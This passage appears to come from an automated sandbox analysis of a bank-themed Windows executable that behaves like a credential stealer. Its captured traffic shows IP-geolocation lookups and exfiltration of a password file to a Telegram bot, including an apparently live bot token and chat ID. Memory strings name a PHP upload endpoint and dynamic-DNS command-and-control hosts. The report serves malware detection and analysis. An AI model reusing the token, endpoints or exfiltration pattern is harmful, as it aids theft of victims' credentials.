Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:585948%0D%0ADate%20and%20Time:%2026/11/2024%20/%2007:56:04%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20585948%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org

Source: unknown

HTTP traffic detected: POST /bot7763512808:AAF6jV3Q9vl-Dge89AACabTutj739SesQH0/sendDocument?chat_id=-4551023826&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd0e6439c8d8e7Host: api.telegram.orgContent-Length: 580

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Mon, 25 Nov 2024 10:42:39 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002DA8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://51.38.247.67:8081/_send_.php?L
Source: denizbank 25.11.2024 E80 aspc.exe, 00000000.00000002.1799552276.0000000003801000.00000004.00000800.00020000.00000000.sdmp, denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4213833630.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
Source: denizbank 25.11.2024 E80 aspc.exe, 00000000.00000002.1799552276.0000000003801000.00000004.00000800.00020000.00000000.sdmp, denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002D31000.00000004.00000800.00020000.00000000.sdmp, denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4213833630.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://aborters.duckdns.org:8081
Source: denizbank 25.11.2024 E80 aspc.exe, 00000000.00000002.1799552276.0000000003801000.00000004.00000800.00020000.00000000.sdmp, denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002D31000.00000004.00000800.00020000.00000000.sdmp, denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4213833630.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://anotherarmy.dns.army:8081
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002D31000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: denizbank 25.11.2024 E80 aspc.exe, 00000000.00000002.1799552276.0000000003801000.00000004.00000800.00020000.00000000.sdmp, denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4213833630.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/q
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4221944862.0000000006590000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4214744246.000000000123B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4222170453.0000000006610000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.5.dr	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4222170453.0000000006610000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?6ed5f34854f0f
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4222170453.0000000006610000.00000004.00000020.00020000.00000000.sdmp, denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215176460.0000000001295000.00000004.00000020.00020000.00000000.sdmp, denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4214744246.000000000123B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?ba054f6b56195
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4221944862.0000000006590000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabb
Source: denizbank 25.11.2024 E80 aspc.exe, 00000000.00000002.1799143667.0000000002846000.00000004.00000800.00020000.00000000.sdmp, denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002D31000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: denizbank 25.11.2024 E80 aspc.exe	String found in binary or memory: http://tempuri.org/DataSet1.xsd
Source: denizbank 25.11.2024 E80 aspc.exe, 00000000.00000002.1799552276.0000000003801000.00000004.00000800.00020000.00000000.sdmp, denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002D31000.00000004.00000800.00020000.00000000.sdmp, denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4213833630.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://varders.kozow.com:8081
Source: denizbank 25.11.2024 E80 aspc.exe, 00000000.00000002.1802075013.0000000006982000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: denizbank 25.11.2024 E80 aspc.exe, 00000000.00000002.1802075013.0000000006982000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: denizbank 25.11.2024 E80 aspc.exe, 00000000.00000002.1802075013.0000000006982000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: denizbank 25.11.2024 E80 aspc.exe, 00000000.00000002.1802075013.0000000006982000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: denizbank 25.11.2024 E80 aspc.exe, 00000000.00000002.1802075013.0000000006982000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: denizbank 25.11.2024 E80 aspc.exe, 00000000.00000002.1802075013.0000000006982000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: denizbank 25.11.2024 E80 aspc.exe, 00000000.00000002.1802075013.0000000006982000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: denizbank 25.11.2024 E80 aspc.exe, 00000000.00000002.1802075013.0000000006982000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: denizbank 25.11.2024 E80 aspc.exe, 00000000.00000002.1802075013.0000000006982000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: denizbank 25.11.2024 E80 aspc.exe, 00000000.00000002.1802075013.0000000006982000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: denizbank 25.11.2024 E80 aspc.exe, 00000000.00000002.1802075013.0000000006982000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fonts.com
Source: denizbank 25.11.2024 E80 aspc.exe, 00000000.00000002.1802075013.0000000006982000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: denizbank 25.11.2024 E80 aspc.exe, 00000000.00000002.1802075013.0000000006982000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: denizbank 25.11.2024 E80 aspc.exe, 00000000.00000002.1802075013.0000000006982000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: denizbank 25.11.2024 E80 aspc.exe, 00000000.00000002.1802075013.0000000006982000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: denizbank 25.11.2024 E80 aspc.exe, 00000000.00000002.1802075013.0000000006982000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: denizbank 25.11.2024 E80 aspc.exe, 00000000.00000002.1802075013.0000000006982000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: denizbank 25.11.2024 E80 aspc.exe, 00000000.00000002.1802075013.0000000006982000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: denizbank 25.11.2024 E80 aspc.exe, 00000000.00000002.1802075013.0000000006982000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: denizbank 25.11.2024 E80 aspc.exe, 00000000.00000002.1802075013.0000000006982000.00000004.00000800.00020000.00000000.sdmp, denizbank 25.11.2024 E80 aspc.exe, 00000000.00000002.1802050663.00000000058B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.sakkal.com
Source: denizbank 25.11.2024 E80 aspc.exe, 00000000.00000002.1802075013.0000000006982000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: denizbank 25.11.2024 E80 aspc.exe, 00000000.00000002.1802075013.0000000006982000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.tiro.com
Source: denizbank 25.11.2024 E80 aspc.exe, 00000000.00000002.1802075013.0000000006982000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.typography.netD
Source: denizbank 25.11.2024 E80 aspc.exe, 00000000.00000002.1802075013.0000000006982000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: denizbank 25.11.2024 E80 aspc.exe, 00000000.00000002.1802075013.0000000006982000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002DA8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: denizbank 25.11.2024 E80 aspc.exe, 00000000.00000002.1799552276.0000000003801000.00000004.00000800.00020000.00000000.sdmp, denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002DA8000.00000004.00000800.00020000.00000000.sdmp, denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp, denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4213833630.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot7763512808:AAF6jV3Q9vl-Dge89AACabTutj739SesQH0/sendDocument?chat_id=-455
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002DA8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: denizbank 25.11.2024 E80 aspc.exe, 00000000.00000002.1799552276.0000000003801000.00000004.00000800.00020000.00000000.sdmp, denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002D31000.00000004.00000800.00020000.00000000.sdmp, denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4213833630.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4218909070.0000000003E87000.00000004.00000800.00020000.00000000.sdmp, denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002DA8000.00000004.00000800.00020000.00000000.sdmp, denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4218909070.0000000003E60000.00000004.00000800.00020000.00000000.sdmp, denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4218909070.0000000004004000.00000004.00000800.00020000.00000000.sdmp, denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4218909070.0000000003FB6000.00000004.00000800.00020000.00000000.sdmp, denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4218909070.0000000003E12000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4218909070.0000000003E62000.00000004.00000800.00020000.00000000.sdmp, denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4218909070.0000000003E18000.00000004.00000800.00020000.00000000.sdmp, denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4218909070.0000000003DED000.00000004.00000800.00020000.00000000.sdmp, denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4218909070.0000000003FBC000.00000004.00000800.00020000.00000000.sdmp, denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4218909070.0000000003F91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4218909070.0000000003E87000.00000004.00000800.00020000.00000000.sdmp, denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002DA8000.00000004.00000800.00020000.00000000.sdmp, denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4218909070.0000000003E60000.00000004.00000800.00020000.00000000.sdmp, denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4218909070.0000000004004000.00000004.00000800.00020000.00000000.sdmp, denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4218909070.0000000003FB6000.00000004.00000800.00020000.00000000.sdmp, denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4218909070.0000000003E12000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4218909070.0000000003E62000.00000004.00000800.00020000.00000000.sdmp, denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4218909070.0000000003E18000.00000004.00000800.00020000.00000000.sdmp, denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4218909070.0000000003DED000.00000004.00000800.00020000.00000000.sdmp, denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4218909070.0000000003FBC000.00000004.00000800.00020000.00000000.sdmp, denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4218909070.0000000003F91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002DA8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49985
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49861
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49980
Source: unknown	Network traffic detected: HTTP traffic on port 49800 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50057
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50059
Source: unknown	Network traffic detected: HTTP traffic on port 50022 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50102 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 50125 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49855
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49976
Source: unknown	Network traffic detected: HTTP traffic on port 50085 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49973
Source: unknown	Network traffic detected: HTTP traffic on port 50039 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50010 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49812 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49967 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50064
Source: unknown	Network traffic detected: HTTP traffic on port 50091 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50113 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50069
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50107 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50072
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50071
Source: unknown	Network traffic detected: HTTP traffic on port 49806 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49849
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49967
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49965
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49843
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49960
Source: unknown	Network traffic detected: HTTP traffic on port 50034 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50078
Source: unknown	Network traffic detected: HTTP traffic on port 50057 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50130 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49892 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50096 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50081
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50085
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50084
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49837
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49956
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49953
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49952
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49831
Source: unknown	Network traffic detected: HTTP traffic on port 50119 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50087
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50086
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50089
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50088
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50090
Source: unknown	Network traffic detected: HTTP traffic on port 50051 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50092
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50091
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50094
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50093
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50096
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50095
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49827
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49946
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49788
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50018
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50010
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50130
Source: unknown	Network traffic detected: HTTP traffic on port 50090 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50013
Source: unknown	Network traffic detected: HTTP traffic on port 50078 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50026 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49980 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49892
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50022
Source: unknown	Network traffic detected: HTTP traffic on port 50095 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50026
Source: unknown	Network traffic detected: HTTP traffic on port 49985 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50000 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50103 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50084 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50039
Source: unknown	Network traffic detected: HTTP traffic on port 49928 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50031
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50034
Source: unknown	Network traffic detected: HTTP traffic on port 49940 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49956 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50104 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 50089 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49998
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 49973 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50121 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 49923 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49993
Source: unknown	Network traffic detected: HTTP traffic on port 49818 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49917 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50044
Source: unknown	Network traffic detected: HTTP traffic on port 50115 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50046
Source: unknown	Network traffic detected: HTTP traffic on port 50109 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50072 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49934 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50051
Source: unknown	Network traffic detected: HTTP traffic on port 50044 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49866
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49987
Source: unknown	Network traffic detected: HTTP traffic on port 50013 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50059 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50094 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50071 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49849 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49900 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50106
Source: unknown	Network traffic detected: HTTP traffic on port 49866 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50105
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50107
Source: unknown	Network traffic detected: HTTP traffic on port 49837 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49820 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50109
Source: unknown	Network traffic detected: HTTP traffic on port 49946 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50018 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50100
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50102
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50101
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50104
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50103
Source: unknown	Network traffic detected: HTTP traffic on port 49855 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49861 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50088 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50117
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50119
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50111
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50113
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50115
Source: unknown	Network traffic detected: HTTP traffic on port 50099 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50031 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49831 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50127 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50100 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49782 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50006
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50127
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50129
Source: unknown	Network traffic detected: HTTP traffic on port 49952 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49794
Source: unknown	Network traffic detected: HTTP traffic on port 50093 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50000
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50121
Source: unknown	Network traffic detected: HTTP traffic on port 50111 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50123
